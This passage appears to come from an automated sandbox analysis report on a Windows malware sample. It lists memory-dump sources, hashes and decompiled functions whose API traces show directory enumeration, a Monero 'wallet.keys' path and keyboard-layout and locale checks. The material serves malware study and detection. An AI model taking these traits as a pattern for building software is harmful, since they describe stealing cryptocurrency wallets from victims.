                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: f069a90a51432392f73a7b113848906f0d53d4be52f2fb92a382e8d43080dbd4
                    • Instruction ID: 14277b01a44a781da5e4ff5ec0865bbe12d8419d101e48b9702a403f64d446a0
                    • Opcode Fuzzy Hash: f069a90a51432392f73a7b113848906f0d53d4be52f2fb92a382e8d43080dbd4
                    • Instruction Fuzzy Hash: 8212DA719101189BDB19FB60DCA6BEE7378AF94340F5045A9B50A73091EF706F89CFA2
                    Function 0095DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00970C2E), ref: 0095DE5E
                    • StrCmpCA.SHLWAPI(?,009714C8), ref: 0095DEAE
                    • StrCmpCA.SHLWAPI(?,009714CC), ref: 0095DEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095E3E0
                    • FindClose.KERNEL32(000000FF), ref: 0095E3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: b5004ff547b23a0e91cce983c9e84daab8f37e28e45e6772d761343f6e39ea11
                    • Instruction ID: 3d950f5f929e896ae4527ec3b845a3e7df086bc76cf648157917796607a9ba42
                    • Opcode Fuzzy Hash: b5004ff547b23a0e91cce983c9e84daab8f37e28e45e6772d761343f6e39ea11
                    • Instruction Fuzzy Hash: 21F18D719141189ADB19FB60DD96BEE7338BF94300F90419AA51A73091EF306F8ACF66
                    Function 0095DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009714B0,00970C2A), ref: 0095DAEB
                    • StrCmpCA.SHLWAPI(?,009714B4), ref: 0095DB33
                    • StrCmpCA.SHLWAPI(?,009714B8), ref: 0095DB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095DDCC
                    • FindClose.KERNEL32(000000FF), ref: 0095DDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 98039049768c48f0826c953321c7109451a69028291cb41db8938d1a3084d094
                    • Instruction ID: 1e9204312d99a745d9b2f3ad10e84008b321361185289cf8f071c99691c39518
                    • Opcode Fuzzy Hash: 98039049768c48f0826c953321c7109451a69028291cb41db8938d1a3084d094
                    • Instruction Fuzzy Hash: 5A911F729001049BCB14FFB0ED96AED737DABC4341F408669B90AA7191EE349B5DCF92
                    Function 00D1862B Relevance: 12.8, Strings: 9, Instructions: 1593COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0y[?$4{\g$4{\g$J[g]$L:<y$P7o$U<o$rD~[$_}>
                    • API String ID: 0-88562457
                    • Opcode ID: 68b5f889540f5f21ae6f3ee60d442637be324c2ce8376b8c09dce6d2d3d49ec2
                    • Instruction ID: cf231bfbbfbc89b1c4881faa0547e49246e2cba83b5080be7067c01b4e7b3e83
                    • Opcode Fuzzy Hash: 68b5f889540f5f21ae6f3ee60d442637be324c2ce8376b8c09dce6d2d3d49ec2
                    • Instruction Fuzzy Hash: C7B2F5F360C2049FE3046E2DEC8567AB7E9EFD4720F1A893DEAC483744EA3558458697
                    Function 00D22869 Relevance: 11.6, Strings: 8, Instructions: 1621COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ))S$4B|$B$;;$B{g$\qr%$mTi_$ps$tl_a
                    • API String ID: 0-789589915
                    • Opcode ID: ed771dd54cb6c0ebbff0c8a851ed7253d04862f88271955feed8b95726c51c54
                    • Instruction ID: 536ba0c32cec83f039860f548e52e93695ac4b52fce2ee7f42a72784907742e2
                    • Opcode Fuzzy Hash: ed771dd54cb6c0ebbff0c8a851ed7253d04862f88271955feed8b95726c51c54
                    • Instruction Fuzzy Hash: 4BB229F3A0C2049FE7046E29EC8567AB7E9EF94720F1A893DE6C5C3344E63598058797
                    Function 00967B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,009705AF), ref: 00967BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00967BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00967C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00967C62
                    • LocalFree.KERNEL32(00000000), ref: 00967D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: 4d1630ac4a02a39c813a6e744f1b56403d8f90abb661ff33d4b86dc1a6bce810
                    • Instruction ID: 091753471b30868d960313cc435664888ba7c0b2b9638e47195954635d7869ee
                    • Opcode Fuzzy Hash: 4d1630ac4a02a39c813a6e744f1b56403d8f90abb661ff33d4b86dc1a6bce810
                    • Instruction Fuzzy Hash: C3413971940218ABCB24DB94DC99BEEB3B8FF84704F204199E10973290DB342F85CFA1
                    Function 00D20C78 Relevance: 10.4, Strings: 7, Instructions: 1693COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: y_$!nv~$"Rw$1S]$PIp7$iJD$k=
                    • API String ID: 0-2287754121
                    • Opcode ID: 6cd6c48ad3ce051248bad0de97db0cb90584cd551ec1c33b18d85ad9cb182cd0
                    • Instruction ID: e02e15d4bb34a3642f75c0275fdfe9728bfdbb47c549b34830004e1c312862b7
                    • Opcode Fuzzy Hash: 6cd6c48ad3ce051248bad0de97db0cb90584cd551ec1c33b18d85ad9cb182cd0
                    • Instruction Fuzzy Hash: E3B227F36086009FE308AE2DEC8577AB7E6EFD4320F1A853DE6C587744E93598058697
                    Function 00D24350 Relevance: 10.4, Strings: 7, Instructions: 1619COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: P}/$#V"D$Eiwl$M0gu$Vgs$`y}$~'?
                    • API String ID: 0-138319148
                    • Opcode ID: de3ddef64288f782d5d58b7cbcd7e673ba730f08c903e211cb5f6fd0bc1339f5
                    • Instruction ID: acab6c6ca5fe38efc6f3810c235b804aaacd87b0f7a13d0cb9687fa2c7519e4f
                    • Opcode Fuzzy Hash: de3ddef64288f782d5d58b7cbcd7e673ba730f08c903e211cb5f6fd0bc1339f5
                    • Instruction Fuzzy Hash: 22B2F7F3A08200AFE304AE29EC8567AFBE5EF94720F1A493DE6C5C3744E63559018797
                    Function 00D1A06B Relevance: 10.4, Strings: 7, Instructions: 1612COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %Mw}$1d|$[Q@{$c[~O$d9/l$Sw~$ah;
                    • API String ID: 0-2127843254
                    • Opcode ID: c63ce694968073630bcee3618c55e1d89cf4a8d8473907771d8b376f42620cd9
                    • Instruction ID: 23c842c6d4bdd9f5d060beab4b7c100ef0ca09a9b6bd64eb2c1b190901f7f249
                    • Opcode Fuzzy Hash: c63ce694968073630bcee3618c55e1d89cf4a8d8473907771d8b376f42620cd9
                    • Instruction Fuzzy Hash: 2DB218F3A0C2049FE704AE2DDC8567AFBE9EF94720F1A853DEAC483744E63558058697
                    Function 00D1D72E Relevance: 10.4, Strings: 7, Instructions: 1608COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4}$K+r7$MO/C$d?"$q3lW$|>s>$a?_
                    • API String ID: 0-927511288
                    • Opcode ID: 69e9f1b40ed5a30701285efe9fd3fbcda76edb021fe885697228786193f13b1b
                    • Instruction ID: 3eaf1285ef681995abe6446d3823eca778d198d3618044ed2157b2275fa2fb8b
                    • Opcode Fuzzy Hash: 69e9f1b40ed5a30701285efe9fd3fbcda76edb021fe885697228786193f13b1b
                    • Instruction Fuzzy Hash: 58B219F3A082149FE304AE2DDC8567AFBE9EF94720F1A493DE6C5C7344E93598018796
                    Function 0095E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00970D73), ref: 0095E4A2
                    • StrCmpCA.SHLWAPI(?,009714F8), ref: 0095E4F2
                    • StrCmpCA.SHLWAPI(?,009714FC), ref: 0095E508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095EBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
